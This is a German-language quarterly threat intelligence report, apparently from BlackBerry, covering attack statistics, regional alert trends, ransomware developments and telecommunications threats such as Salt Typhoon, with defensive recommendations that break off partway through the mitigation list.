Globaler Bedrohungsdatenbericht

Ausgabe Januar 2025

Berichtszeitraum: 1. Juli - 30. September 2024

Umsetzbare Intelligenz, die wichtig ist

Dieser Bericht bietet einen umfassenden Überblick über die globale Bedrohungslandschaft, wobei der Schwerpunkt auf der Bereitstellung von umsetzbaren Informationen liegt, die Führungskräfte nutzen können, um ihre Organisationen proaktiv zu schützen. Dieser Bericht umfasst den Zeitraum von Juli bis September 2024.

Die BlackBerry® Cybersicherheitslösungen haben fast eine Million Angriffe auf US-Kunden abgewehrt, 80.000 eindeutige bösartige Signaturen identifiziert und 430.000 gezielte Angriffe auf Wirtschaftsunternehmen verhindert.

Lesen Sie Cyberattacken rund um den Globus für weitere Informationen.

Von den 600.000 Angriffen auf kritische Infrastrukturen, die in diesem Quartal entdeckt wurden, zielten 45 % auf Finanzinstitute ab.

Entdecken Sie die internen und externen Erkenntnisse unseres Cyber Threat Intelligence (CTI)-Teams im Bereich Kritische Infrastrukturen.

PowerShell-basierte Angriffe zeigen, dass sich die Bedrohungsakteure regional anpassen und gleichzeitig die globalen Techniken in NALA, APAC und EMEA beibehalten.

Lesen Sie, wie unsere MDR-Team-Analyse die sich entwickelnden regionalen Angriffsmuster und die globale Persistenz von PowerShell-basierten Bedrohungen aufdeckt.

Der Abschnitt "Law Enforcement Limelight" zeigt die Entwicklung von Ransomware hin zu einer gezielten psychologischen Kriegsführung auf, bei der exfiltrierte Daten zunehmend als Waffe eingesetzt werden, um den Ruf zu schädigen und strategische Vorteile zu erzielen, anstatt nur finanzielle Gewinne zu erzielen.

Mehr erfahren über die Ransomware-Epidemie, die Kanada betrifft.

 

RansomHub beherbergt nun wichtige Partner wie LockBit und ALPHV, die für die meisten der im dritten Quartal 2024 entdeckten Ransomware-Operationen verantwortlich sind.

Mehr erfahren unter Bedrohungsakteure und Werkzeuge.

Die neue Ransomware-Gruppe Lynx wendet eine aggressive Doppelerpressungstaktik an (Kombination von Datendiebstahl und Verschlüsselung) und expandiert von Nordamerika und Australien auf die europäischen Märkte.

Lesen Sie den Abschnitt " Verbreitete Bedrohungen", um sich über aktuelle Bedrohungen für alle wichtigen Betriebssysteme zu informieren.

Wir stellen eine Liste von verbesserten Sicherheitsprotokollen und Gegenmaßnahmen zur Verfügung, um den sich entwickelnden Ransomware-Taktiken zu begegnen, wobei der Schwerpunkt auf der Reduzierung der Gefährdung und der Kommunikationssicherheit liegt.

Sehen Sie sich die Liste in den Strategien zur Risikominderung an.

Detaillierte Strategien zur Schadensbegrenzung als Reaktion auf Salt Typhoon Verstöße mit Schwerpunkt auf dem Schutz kritischer Kommunikationsinfrastrukturen.

Untersuchung von Verteidigungsstrategien zum Schutz kritischer Kommunikationsinfrastrukturen.

Inhaltsübersicht

Der BlackBerry® Global Threat Intelligence Report bietet CISOs und Entscheidungsträgern wichtige Einblicke in die neuesten Cybersecurity-Bedrohungen und -Herausforderungen, die für ihre jeweiligen Branchen und Regionen relevant sind.

Im Jahr 2024 prägten zahlreiche Faktoren die Bedrohungslandschaft im Bereich der Cybersicherheit. Wichtige Wahlen auf der ganzen Welt, anhaltende Konflikte und geopolitische Spannungen wegen verschiedener strittiger Fragen schufen ein unbeständiges Umfeld. Diese Unruhen haben böswilligen Akteuren und Cyberbedrohungsgruppen weltweit Auftrieb gegeben. Diese Akteure nutzen Unsicherheit und Unruhe aus, um finanzielle Gewinne zu erzielen, Cyberspionage zu betreiben, Schaden anzurichten oder das Chaos zu vergrößern.

Cyberangriffe rund um den Globus

BlackBerrys KI-gesteuerte Cybersecurity-Leistung

Während des dreimonatigen Zeitraums von Juli bis September 2024 schützten BlackBerrys KI-gesteuerte Cybersicherheitslösungen eine Vielzahl von Kunden auf der ganzen Welt. Unsere Sicherheitstechnologie vereitelte fast zwei Millionen Cyberangriffe und registrierte täglich über 3.000 einzelne bösartige Hashes, die auf unsere Kunden abzielten.

Die Vereinigten Staaten waren in diesem Quartal mit den meisten Cyberangriffen konfrontiert, weit mehr als jedes andere Land. Die Cybersecurity-Technologie von BlackBerry blockierte fast eine Million Angriffe auf US-Kunden, von denen etwa 80.000 mit einzigartigen bösartigen Hashes durchgeführt wurden.

BlackBerry verfolgt die Anzahl der einzelnen bösartigen Hashes, die bei diesen Angriffen verwendet werden, im Vergleich zur Gesamtzahl der Angriffe. Häufig wird handelsübliche Malware in größeren Angriffen wiederverwendet, was dazu führt, dass ein und dieselbe Binärdatei mehrfach identifiziert wird.

Einzigartige oder neuartige Malware wird in der Regel bei sehr gezielten Angriffen eingesetzt. In diesem Fall investieren Bedrohungsakteure viel Zeit und Mühe in die Entwicklung neuer Malware mit spezifischen Attributen, um eine bestimmte Branche, Organisation oder ein hochwertiges Ziel (HVT) durch scheinbar kleine, aber letztlich wirkungsvolle Angriffe zu kompromittieren.BlackBerry-Kunden in der Region Nordamerika und Lateinamerika (NALA) verzeichneten die höchste Anzahl versuchter Angriffe (d. h. Angriffe, die durch die Cybersecurity-Lösungen von BlackBerry gestoppt wurden) und die größte Anzahl an einzigartigen Hashes. APAC (Asien und Pazifik) lag an zweiter Stelle und EMEA (Europa, Naher Osten, Afrika) an dritter Stelle.

Abbildung 1: Gestoppte Angriffe vs. Unique Hashes pro Region Juli - September 2024.
Abbildung 1: Gestoppte Angriffe vs. Unique Hashes pro Region Juli - September 2024.

In diesem Berichtszeitraum zeigte die Analyse des BlackBerry Managed Detection and Response (MDR)-Teams deutliche regionale Muster in der Bedrohungsaktivität. PowerShell-basierte Angriffe erwiesen sich als konsistente globale Bedrohung, wobei die Base64-kodierte Ausführung in allen Regionen zu den fünf häufigsten Erkennungen gehörte - Platz eins in NALA, Platz fünf in APAC und Platz drei in EMEA.

Jede Region wies auch einzigartige Bedrohungsmerkmale auf:

  • NALA verzeichnete eine große Anzahl von Systemtool-Missbrauch, wobei umbenannte Sysinternals-Tools und LOLBAS-Shells (Living Off the Land Binaries and Scripts) zu den größten Problemen gehörten.
  • In der APAC-Region gab es zahlreiche Versuche, Anmeldedaten zu stehlen und den Schutz zu umgehen, wobei vor allem Windows Defender ins Visier genommen wurde.
  • EMEA zeigte verschiedene Angriffsmuster, von PowerShell-Download-Befehlen bis hin zur Manipulation von Benutzerkonten.

Diese regionalen Unterschiede in den Cyberangriffsmustern deuten darauf hin, dass die Bedrohungsakteure ihre Vorgehensweisen auf regionale Faktoren abstimmen, während sie einige Techniken weltweit beibehalten.

Abbildung 2: Die fünf wichtigsten CylanceMDR Ausschreibungen nach Regionen.

NALA

1st: Verdächtige Base64-kodierte PowerShell-Ausführung
2: Möglicherweise umbenanntes Sysinternals-Tool wurde ausgeführt
3: Dienste starteten eine LOLBAS-Shell
4: Ausführung von Fernzugriffstools
5: Ausführung des PowerShell-Download-Befehls

APAC

1st: Möglicher Diebstahl von Windows-Anmeldeinformationen
2.: Svchost-Zeitplanaufgabe startet Rundll32
3: Windows Defender-Manipulation über PowerShell
4: Möglicher Msiexec-Missbrauch über DLL-Laden
5: Verdächtige Base64-kodierte PowerShell-Ausführung

EMEA

1st: Ausführung des PowerShell-Download-Befehls
2: Möglicher Missbrauch der stdout-Befehlszeile
3: Verdächtige Base64-kodierte PowerShell-Ausführung
4: Erstellung von Benutzerkonten über Net Local Group Add
5: Svchost-Zeitplanaufgabe startet Rundll32

Geopolitische Analyse und Kommentare

Es ist mehr als ein Jahrzehnt her, dass der damalige US-Verteidigungsminister Leon Panetta vor einem möglichen "Cyber-Pearl-Harbor" warnte und auf die Möglichkeit eines lähmenden Cyberangriffs auf kritische US-Infrastrukturen hinwies, der sich auf die gesamte cyber-physische Welt auswirken würde. Zwar hat sich seine düstere Warnung noch nicht bewahrheitet, aber unsere Abhängigkeit von digitalen Technologien, die anfällig für Angriffe, Ausbeutung und Manipulation sind, ist gewachsen. Einige haben das Dilemma, in dem sich unsere digitalisierten Gesellschaften befinden, als "teuflisches Geschäft" bezeichnet, bei dem die Sicherheit zugunsten von Wirtschaftswachstum, Produktivitätssteigerung und Bequemlichkeit aufs Spiel gesetzt wurde.

Vor zehn Jahren gab es nur eine Handvoll hauptsächlich staatlicher Akteure, die in der Lage waren, ausgeklügelte Cyberangriffe durchzuführen. Heute gibt es Hunderte von staatlichen und nichtstaatlichen Akteuren. Die jüngste nationale Cyber-Bedrohungsanalyse der kanadischen Regierung sowie die Cyber-Bedrohungsanalysen anderer verbündeter Länder, wie z. B. des Vereinigten Königreichs, beschreiben den Zustand der Cybersicherheit als zunehmend unvorhersehbar mit einer wachsenden Zahl aggressiver Bedrohungsakteure, die neue Technologien und Taktiken einsetzen, um ihre bösartigen Aktivitäten zu verbessern und zu verstärken.

Die Auswirkungen dieser Ausbreitung sind allgegenwärtig. Nach Angaben der Global Anti-Scam Alliance waren im Jahr 2023 schätzungsweise 25,5 % der Weltbevölkerung von Cyberbetrug betroffen. Im Vereinigten Königreich haben mehr als 70 % der mittleren und großen Unternehmen und fast 66 % der einkommensstarken Wohltätigkeitsorganisationen irgendeine Form von Cybersicherheitsverletzungen erlebt. In Kanada waren mehr als zwei Drittel (70 %) der Kanadier im vergangenen Jahr von einem Cybersicherheitsvorfall betroffen. BlackBerrys eigene Analyse bestätigt diese Trends und zeigt die Zunahme von Cyberangriffen auf kritische Infrastrukturen.

Ransomware wird weithin als die störendste Form der Cyberkriminalität angesehen, und es wächst die Befürchtung, dass "Ransomware nicht nur Unternehmen, sondern auch ganze Länder lahmlegen könnte". Tatsächlich nehmen Ransomware-Angriffe auf kritische Infrastrukturen, wie z. B. den Gesundheitssektor, deutlich zu. In den Vereinigten Staaten meldete das Department of Health and Human Services zwischen 2018 und 2022 einen 278-prozentigen Anstieg der großen Datenschutzverletzungen durch Ransomware in Krankenhäusern. Und mit der steigenden Zahl von Ransomware-Angriffen wächst auch die Vielfalt der von Ransomware-Akteuren verwendeten Taktiken und Techniken. Ransomware-Gruppen wenden inzwischen vielschichtige Erpressungsstrategien an, die die Exfiltration und Verschlüsselung von Opferdaten beinhalten und gleichzeitig Datenleckseiten im Dark Web unterhalten, auf denen gestohlene Daten von nicht kooperierenden Opfern veröffentlicht werden. Das Netz der Kriminalität wird immer komplexer.

Die Herausforderung ist nicht nur technischer Natur. Die alarmierende Realität ist, dass Cyberkriminalität negative Auswirkungen auf das menschliche Wohlergehen hat. Forscher haben einen Anstieg der Sterblichkeit im Krankenhaus um 35 % bis 41 % nach einem Ransomware-Angriff auf ein Krankenhaus dokumentiert. Andere Studien haben gezeigt, wie sich Ransomware-Angriffe kaskadenartig auf benachbarte Notaufnahmen auswirken, erhebliche Betriebsstörungen verursachen und sich negativ auf das Eintreffen von Krankenwagen, die Wartezeiten für Behandlungen und die Patientenversorgung auswirken.

Ein weiterer besorgniserregender Trend ist das Entstehen einer mit Cyberkriminalität verbundenen Menschenhandelsindustrie. Die Vereinten Nationen haben dokumentiert, dass im Jahr 2023 etwa 220.000 Menschen in Südostasien für Cyberkriminalität gehandelt werden. Diese Menschen sind in ihrem Leben bedroht und sind Folter und grausamer, unmenschlicher und erniedrigender Behandlung oder Bestrafung, willkürlicher Inhaftierung, sexueller Gewalt, Zwangsarbeit und anderen Formen der Ausbeutung ausgesetzt. Organisierte Verbrecherbanden betreiben solche Operationen seit mehr als einem Jahrzehnt von Kambodscha aus und haben sich inzwischen auf andere Länder wie Myanmar, Thailand, Laos und die Philippinen ausgedehnt. In einigen Fällen werden Menschen aus Brasilien und Ostafrika zu diesen erzwungenen Cyberkriminalitätsoperationen in Südostasien gebracht.

Da sich Cyberbedrohungen immer weiter ausbreiten, arbeiten Regierungen und die Industrie hart daran, die Ransomware Ökosystem zu stören und unsere kollektive Fähigkeit zu stärken, böswillige Cyber-Akteure abzuschrecken. Im Oktober 2024 vereinbarten BlackBerry und Public Safety Canada den gemeinsamen Vorsitz des Public-Private Sector Advisory Panel der International Counter Ransomware Initiative (CRI). Gemeinsam mit den 68 Mitgliedsstaaten der CRI arbeitet BlackBerry daran, die kollektive Widerstandsfähigkeit gegen Ransomware zu stärken und Regierungen auf der ganzen Welt besser in die Lage zu versetzen, die Bedrohung durch Ransomware und andere Cyber-Bedrohungen zu bekämpfen.

Abbildung 3: Verteilung der Angriffe und eindeutigen Hashes auf kritische Infrastrukturen und kommerzielle Unternehmen, April - Juni 2024 vs. Juli - September 2024.

Cyberattacken-Landschaft nach Branchen

Die BlackBerry-Analysten gingen von einer globalen Perspektive zu einem branchenspezifischen Fokus über und identifizierten die primären Ziele der Bedrohungsakteure. Für die Zwecke dieses Berichts werden die Industriesektoren in zwei Hauptkategorien zusammengefasst: kritische Infrastruktur und kommerzielle Unternehmen.

BlackBerry sammelt Telemetriedaten und Statistiken über Kunden mit kritischen Infrastrukturen in den 16 von der Cybersecurity and Infrastructure Security Agency (CISA) definierten Branchen. Dazu gehören das Gesundheitswesen, Behörden, Energie, Finanzen und Verteidigung. Kommerzielle Unternehmen sind solche, die sich mit der Produktion, dem Vertrieb oder dem Verkauf von Waren und Dienstleistungen befassen. Diese Unternehmen sind in verschiedenen Sektoren wie Fertigung, Einzelhandel und Dienstleistungen tätig. Die nachstehende Abbildung 3 zeigt die Verteilung der Angriffe und eindeutigen Hashes auf kritische Infrastrukturen und Wirtschaftsunternehmen.

Abbildung 3: Verteilung der Angriffe und eindeutigen Hashes auf kritische Infrastrukturen und kommerzielle Unternehmen, April - Juni 2024 vs. Juli - September 2024.

Bedrohungen für kritische Infrastrukturen

Kritische Infrastrukturen können ein potenziell lukratives Ziel für Cyberkriminelle sein. Die wertvollen Daten, über die diese Branchen verfügen, werden oft auf Untergrundmärkten verkauft, für die Planung künftiger Angriffe verwendet oder für Spionagezwecke eingesetzt. In letzter Zeit häufen sich die Angriffe auf kritische Infrastrukturen wie Gesundheitswesen, Energie, Finanzen und Verteidigung. Für Unternehmen in diesen Sektoren sind Ausfallzeiten kostspielig. Sie sind eher bereit, Lösegeld zu zahlen, um ihre Systeme schnell wiederherzustellen, da ihnen und ihren Kunden durch die Ausfallzeiten und den fehlenden Zugang zu wichtigen Daten potenzielle Verluste entstehen könnten.

Da immer mehr Dienstleistungen digitalisiert werden und mehr Systeme als je zuvor mit dem Internet verbunden sind, geraten Organisationen in diesen Sektoren häufig ins Fadenkreuz von Cyberkriminellen. Diese kriminellen Gruppen reichen von unerfahrenen Hackern, die sich Anerkennung verschaffen wollen, bis hin zu organisierten nationalstaatlichen Bedrohungsakteuren und etablierten Ransomware-Gruppen, die ihren Feinden Chaos zufügen wollen. Die Auswirkungen dieser Angriffe können verheerend sein, da sie die nationale Sicherheit beeinträchtigen und wichtige Abläufe stören sowie die wirtschaftliche Stabilität und sogar Menschenleben gefährden.

BlackBerry Cybersicherheitslösungen, einschließlich CylanceENDPOINT™, vereitelten in diesem Quartal fast 600.000 Angriffe auf kritische Infrastrukturen, wobei 45 % dieser Angriffe auf den Finanzsektor abzielten. Der Finanzsektor ist nach wie vor ein beliebtes Ziel für Cyberangreifer.

Abbildung 4: Aufschlüsselung der Angriffe und eindeutigen Hashes nach kritischen Infrastruktursektoren.
Abbildung 4: Aufschlüsselung der Angriffe und eindeutigen Hashes nach kritischen Infrastruktursektoren.
Im nächsten Abschnitt werfen wir einen genaueren Blick auf einige der häufigsten Bedrohungen für kritische Infrastrukturen, auf die wir in diesem Quartal gestoßen sind. Der erste Teil listet die Arten von Bedrohungen auf, die BlackBerry am häufigsten identifiziert und vor denen sich seine Kunden schützen. Der zweite Teil befasst sich mit Bedrohungen, die von Dritten gemeldet werden, z. B. von Branchenzeitungen, Sicherheitsanbietern oder Regierungsbehörden.
Abbildung 5: Verteilung der BlackBerry-internen Bedrohungen auf kritische Infrastrukturen in diesem Quartal.

Bedrohungen für kommerzielle Unternehmen

Die gewerbliche Wirtschaft, die Sektoren wie Investitionsgüter, Einzelhandel und Großhandel umfasst, ist ein bevorzugtes Ziel für ausgeklügelte Cyberangriffe. Erfolgreiche Angriffe können zu kompromittierten Netzwerken, Datenverlusten, Betriebsunterbrechungen, Rufschädigung und erheblichen finanziellen Kosten führen.

In diesem Quartal haben die Cybersecurity-Lösungen von BlackBerry mehr als 430.000 gezielte Angriffe auf kommerzielle Unternehmen abgewehrt. Das folgende Diagramm zeigt die Branchen mit dem größten Volumen an Angriffsversuchen und eindeutigen Malware-Hashes.

Abbildung 6: Verteilung der blockierten Angriffe und der eindeutigen Hashes in der Unternehmensindustrie.
Abbildung 6: Verteilung der blockierten Angriffe und der eindeutigen Hashes in der Unternehmensindustrie.
Abbildung 7: Die wichtigsten internen Bedrohungen für Wirtschaftsunternehmen von Juli bis September 2024.
Abbildung 7: Die wichtigsten internen Bedrohungen für Wirtschaftsunternehmen von Juli bis September 2024.

Sicherheit in der Kommunikation: Bedrohungen und Abhilfemaßnahmen

Aufgrund ihrer nahezu universellen Nutzung ist die moderne Telekommunikationsinfrastruktur heute mit einer noch nie dagewesenen Anzahl ausgeklügelter Bedrohungen konfrontiert, die auf ihre grundlegenden Funktionen und Datenströme abzielen. Von nationalstaatlichen Akteuren, die groß angelegte Spionage betreiben, bis hin zu cyberkriminellen Unternehmen, die "Abhören als Dienstleistung" anbieten, nutzen diese Bedrohungen die inhärenten Kompromisse zwischen globaler Konnektivität und Sicherheit in den öffentlichen Telekommunikationsnetzen der einzelnen Länder aus.

Da sich Unternehmen bei sensiblen Vorgängen zunehmend auf mobile und digitale Kommunikation verlassen, sind die Sicherheitslücken in diesen Netzwerken zu kritischen Schwachstellen geworden, die Wettbewerbsvorteile, strategische Pläne und vertrauliche Informationen gefährden können. Die jüngste Kaskade von Sicherheitsverletzungen bei Telekommunikationsanbietern zeigt, dass kein Unternehmen davon ausgehen kann, dass seine Kommunikation sicher ist, nur weil es die Standarddienste eines Anbieters nutzt.

Zu Beginn dieses Quartals gab AT&T eine große Sicherheitsverletzung bekannt, bei der Bedrohungsakteure die Anruf- und Textdaten seiner Mobilfunkkunden über einen längeren Zeitraum kompromittiert haben; wir wissen jetzt, dass mehrere Telekommunikationsunternehmen infiltriert wurden. Einige US-Regierungschefs sprachen von der "schlimmsten Sicherheitslücke in der Geschichte der Telekommunikation in unserem Land". Die Sicherheitsverletzung bei AT&T war von großer Bedeutung, da nicht nur AT&T-Kunden betroffen waren, sondern auch alle Personen weltweit, die während des betroffenen Zeitraums mit einem AT&T-Kunden kommuniziert haben. Die kompromittierten Daten enthielten potenziell wertvolle Metadaten über Kommunikationsmuster, den Zeitpunkt von Anrufen und Beziehungen zwischen Nutzern.

In diesem Abschnitt werden wir die verschiedenen Arten von Unternehmen untersuchen, die die Kommunikationsinfrastruktur bedrohen, die Taktiken, die sie anwenden, und die Abhilfemaßnahmen, die Unternehmen zum Schutz ihrer Daten ergreifen können.

 

Bedrohungsakteure

Nationale Akteure stellen eine erhebliche Bedrohung für die internationale Telekommunikationssicherheit dar, wie die jüngsten Ereignisse zeigen, bei denen mit der chinesischen Regierung verbundene Angreifer eine umfassende Cyber-Spionagekampagne durchführten. Diese raffinierten Akteure hatten es auf große Telekommunikationsunternehmen ab gesehen, um auf die Handydaten prominenter Persönlichkeiten, darunter auch US-Präsidentschaftskandidaten, zuzugreifen.

US-Regierungsbeamte gehen davon aus, dass ein als Salt Typhoon bekannter Bedrohungsakteur, der eng mit dem chinesischen Ministerium für Staatssicherheit verbunden ist, hinter der Telekommunikationsinfiltrationskampagne steckt. Ihre Operationen betrafen mehrere große Netzbetreiber, darunter Verizon, AT&T und T-Mobile, wobei die Ermittler feststellten, dass sie in diesen Netzen über ein Jahr lang unentdeckt geblieben waren.

Im Laufe der Zeit haben sich kriminelle Organisationen entwickelt, die hochspezialisierte Angriffsdienste im Telekommunikationssektor anbieten. Dazu gehören Organisationen, die "Call-Interception-as-a-Service" anbieten und "Wire-Tapping-as-a-Service"-Plattformen betreiben, deren Dienste über das Internet käuflich zu erwerben sind. Einige Bedrohungsakteure haben Fähigkeiten entwickelt, um Mobilfunkverbindungen für beliebige Telefonnummern umzuleiten und abzufangen, ohne dass der Endnutzer dies bemerkt.

Der Telekommunikationssektor ist auch mit Bedrohungen durch Gegner konfrontiert, die sich durch die Ausnutzung der Kommunikation Vorteile verschaffen wollen. Diese Akteure haben es auf hochrangige Personen und Organisationen abgesehen, die abgefangene Daten für Erpressungsversuche oder zur Aufdeckung vertraulicher Beziehungen nutzen, um das öffentliche Vertrauen in die Zielperson zu untergraben. Besonders besorgniserregend ist, dass sie in der Lage sind, hochrangige Unterstützer politischer Kandidaten, die sich aus der Öffentlichkeit heraushalten wollen, oder Personen, deren physische Sicherheit von ihrer Anonymität abhängt, wie Journalisten, Reporter und politische Aktivisten, zu identifizieren und möglicherweise bloßzustellen.

Identifizierte Bedrohungen

Die inhärenten Schwachstellen in Telekommunikationsnetzen können Unternehmen einem komplexen Netz von miteinander verbundenen Bedrohungen aussetzen. Öffentliche Telekommunikationsnetze zeichnen sich zwar durch ihre globale Erreichbarkeit aus, doch geht diese Zugänglichkeit mit Sicherheitsnachteilen einher, die böswillige Akteure ausnutzen können (und oft auch tun).

Vom direkten Abhören der Kommunikation bis hin zur ausgefeilten Analyse von Metadaten zielen diese Bedrohungen nicht nur auf den Inhalt der Kommunikation ab, sondern auch auf die Muster und Beziehungen, die sie offenbaren. Jüngste Sicherheitsverletzungen bei großen Telekommunikationsanbietern haben gezeigt, dass diese Bedrohungen nicht nur theoretischer Natur sind, sondern aktive Risiken für die Vertraulichkeit zwischen Arbeitgebern und Arbeitnehmern, Wettbewerbsvorteile und sogar die nationale Sicherheit darstellen. Einige dieser Risiken sind:

Abfangen von Kommunikation: Bedrohungsakteure können sowohl Audio-/Videoanrufe als auch SMS-Nachrichten abfangen und so die Kommunikation in Echtzeit belauschen. Viele der Risiken, die diese Schwachstellen für die Standardtelefonie darstellen, bestehen auch bei den kostenlosen Apps, die für Sprachanrufe und Nachrichten verwendet werden.

Ausbeutung von Metadaten: Bei der Metadatenauswertung sammeln und analysieren Bedrohungsakteure sowohl Call Detail Records (CDR) als auch Message Detail Records (MDR). Anhand dieser Daten können sie detaillierte Karten der Kontaktbeziehungen erstellen und Kommunikationsmuster wie Häufigkeit, Tageszeit und Anrufdauer analysieren. Die Echtzeiteinsicht in diese Metadaten ermöglicht es den Bedrohungsakteuren, die Teilnehmer einzelner Telekommunikationsunternehmen zu verfolgen und ausnutzbare Kommunikationsmuster zu identifizieren.

Ismael Valenzuela, Vice President of BlackBerry Threat Research and Intelligence, erklärt: "Telekommunikations-Metadaten können eine Goldgrube für Cyberkriminelle sein. Selbst wenn die Inhalte von Anrufen und Texten nicht durchsickern, kann das Wissen über den Kontext dieser Anrufe, z. B. wen eine Person anruft, wie oft und wann, leicht als Waffe eingesetzt werden. Bedrohungsakteure können herausfinden, wo Sie ungefähr wohnen, wo Sie arbeiten, mit wem Sie am häufigsten sprechen und sogar, ob Sie potenziell sensible Nummern anrufen, z. B. Gesundheitsdienstleister.

Identitätsbasierte Angriffe: Das Fehlen einer Identitätsüberprüfung in öffentlichen Netzen macht Identitäts- und Telefonnummernspoofing endemisch und fast unmöglich zu verhindern. Bedrohungsakteure können gestohlene Metadaten nutzen, um gezielt Telekommunikationsteilnehmer anzusprechen, indem sie Nummern fälschen, mit denen sie bereits kommuniziert haben. Diejenigen, die den Anruf entgegennehmen, werden höchstwahrscheinlich mit automatischen Anrufen konfrontiert, aber in einigen Fällen können die Angreifer neue Technologien wie Deep-Voice-Generatoren einsetzen, um komplexe Identitätsbetrügereien zu entwickeln.

Das Klonen der Stimme einer realen Person mit Hilfe der generativen KI wird als Audio-Depfake bezeichnet. Diese Art von Angriffen gewinnt in der Unternehmenswelt rapide an Bedeutung, da die Angreifer buchstäblich darauf angewiesen sind, dass die Mitarbeiter der Stimme einer ihnen bekannten Person - z. B. ihres Chefs - vertrauen und dieses Vertrauen missbrauchen, um Finanzbetrügereien mit hohen Summen durchzuführen.

Schwachstellen der Infrastruktur: Die moderne Telekommunikationsinfrastruktur birgt besonders schwierige Herausforderungen. Die Behebung von Schwachstellen erfordert häufig einen umfassenden Austausch von Systemkomponenten, was zu Dienstunterbrechungen führen kann und erhebliche Investitionen der Telekommunikationsanbieter erfordert.

  • Veraltete Systemkomponenten: Kritische Teile des Telekommunikations-Backbones laufen immer noch auf Systemen aus den 1970er und 1980er Jahren, die vor den modernen Cybersicherheitsmaßnahmen entwickelt wurden und hauptsächlich für den Festnetzbetrieb konzipiert sind. Um diese veralteten Komponenten mit den aktuellen Sicherheitsmaßnahmen in Einklang zu bringen, müssten sie verstärkt werden, indem die Kommunikation über sichere Relais-Netzwerke geleitet und eine Ende-zu-Ende-Verschlüsselung implementiert wird, die sowohl den Dateninhalt als auch die Übertragungsmuster schützt.
  • Netzzugangspunkte: Die Verbindungsprotokolle für Mobilfunk-Roaming enthalten inhärente Schwachstellen, die es böswilligen Akteuren ermöglichen, Mobilfunkverbindungen umzuleiten und abzufangen. Diese Schwachstelle besteht bei allen großen Netzbetreibern, darunter AT&T, Verizon und T-Mobile, wie die erfolgreiche Ausnutzung von Netzknotenpunkten bei mehreren Anbietern durch Salt Typhoon zeigt.
  • Authentifizierungssysteme: Grundlegende Sicherheitskontrollen wie die Multi-Faktor-Authentifizierung fehlen in einigen kritischen Telekommunikationsinfrastrukturen ganz erheblich. Diese Lücke ermöglicht es Bedrohungsakteuren, einen dauerhaften Zugang aufrechtzuerhalten, sobald sie sich einmal Zugang verschafft haben.
  • Überwachungssysteme: Die für legale Überwachungsmaßnahmen konzipierte "Lawful Intercept"-Infrastruktur kann kompromittiert werden, um sensible operative Daten über laufende Ermittlungen und Überwachungsziele offenzulegen.
  • Datenübertragungsstellen: Die Verbindungen zwischen Internet-Diensteanbietern und Telekommunikationsnetzen schaffen zusätzliche Schwachstellen, an denen unverschlüsselte E-Mails und andere Mitteilungen abgefangen werden können.
  • Globale Routing-Infrastruktur: Der grundlegende Aufbau von Telekommunikationsnetzen räumt der globalen Konnektivität Vorrang vor der Sicherheit ein, was zu inhärenten Schwachstellen bei der Weiterleitung von Anrufen und Daten zwischen Anbietern und über Regionen hinweg führt.

Sammeln von Informationen: Verstöße gegen die Telekommunikationsvorschriften sind für Bedrohungsakteure eine große Hilfe beim Sammeln von Informationen. Bedrohungsakteure können durchgesickerte Informationen nutzen, um bestimmte Teilnehmer in Echtzeit zu überwachen und in einigen Fällen versteckte Beziehungen zu erkennen. Im Rahmen politischer Kampagnen ermöglicht ihnen diese Überwachung, hochrangige Unterstützer zu entdecken, die versuchen, ihre Privatsphäre zu wahren und vertrauliche Verbindungen offenzulegen. Diese Informationen können zusätzliche Kommunikationsmuster aufdecken, die ebenfalls auf unerwartete Weise ausgenutzt werden können.

"Sie haben vielleicht das Gefühl, dass Sie nichts haben, was ein Angreifer wollen könnte", fügt Valenzuela hinzu, "aber allein das Wissen, wen Sie am häufigsten anrufen und wem Sie am ehesten vertrauen und deshalb einen Anruf annehmen würden, macht es Cyberkriminellen leichter, eine Vielzahl von telefonbasierten Betrügereien durchzuführen, einschließlich solcher, die sich auf gefälschte Audiodaten stützen, um die Stimme einer Ihnen bekannten Person vorzutäuschen.

Sekundäre Bedrohungen: Die Ausnutzung von Schwachstellen in der Telekommunikation kann zu sekundären Bedrohungen führen. Dazu gehören Erpressungsversuche, insbesondere wenn vertrauliche Beziehungen offengelegt werden. Außerdem können die kompromittierten Informationen zum Sammeln von Informationen und zur Spionage verwendet werden. Wenn eine hochrangige Person, Einrichtung oder Organisation kompromittiert wird, kann dies sogar demokratische Prozesse beeinträchtigen und die nationale Sicherheit bedrohen.

Laut David Wiseman, Vizepräsident von BlackBerry SecuSUITE®"Geheimnisse, die Wettbewerbsvorteile bieten - ob auf dem Markt oder auf dem Schlachtfeld - sind anfällig für die Preisgabe. Öffentliche Telekommunikationsnetze sind in erster Linie auf Zugänglichkeit ausgelegt, was oft zu Sicherheitslücken führt."

Ein wesentliches Problem bei öffentlichen Netzwerken, einschließlich verschlüsselter Messaging-Plattformen, ist ihr offener Charakter, der es praktisch jedem erlaubt, ihnen beizutreten. Wiseman erklärt: "Auf Plattformen wie Signal oder WhatsApp registrieren sich die Nutzer selbst, was zu Problemen wie Identitätsfälschung, Betrug und Bedenken über Fälschungen beiträgt. Offene Systeme mit Selbstregistrierung sind von Natur aus risikoreich".

Abhilfemaßnahmen

Um der sich ständig weiterentwickelnden Landschaft der Telekommunikationsbedrohungen zu begegnen, müssen Unternehmen umfassende Sicherheitsmaßnahmen einführen, die über eine einfache Verschlüsselung hinausgehen. Zwar bieten verbraucherfreundliche Kommunikationstools ein gewisses Maß an Schutz, doch reichen sie nicht aus, um ausgefeilte Angriffe auf Nachrichteninhalte und Metadaten abzuwehren.

Eine wirksame Verteidigung erfordert einen mehrschichtigen Ansatz, der technologische Lösungen mit strategischen Protokollen und menschlicher Wachsamkeit kombiniert. Die folgenden Strategien bieten einen Rahmen für Organisationen zum Schutz ihrer sensiblen Kommunikation vor nationalstaatlichen Akteuren, kriminellen Organisationen und anderen Bedrohungsakteuren, die versuchen, Schwachstellen in der Telekommunikation auszunutzen.

Authentifizierung und Identitätsüberprüfung: Multi-Faktor-Authentifizierung (MFA) und Identitätsüberprüfungsprotokolle dienen als wichtige erste Verteidigungslinie gegen unbefugten Zugriff und Social-Engineering-Angriffe.

  • Taktik: Implementieren Sie robuste Authentifizierungssysteme und schulen Sie die Benutzer, unerwartete Mitteilungen über alternative oder sekundäre Kanäle zu verifizieren.
  • Beispiel: Wenn eine Führungskraft außerhalb der normalen Geschäftszeiten eine dringende Nachricht von einem Vorstandsmitglied mit einer ungewöhnlichen Bitte erhält, befolgt sie das Protokoll, indem sie dies über einen separaten, vorher eingerichteten Kommunikationskanal überprüft.

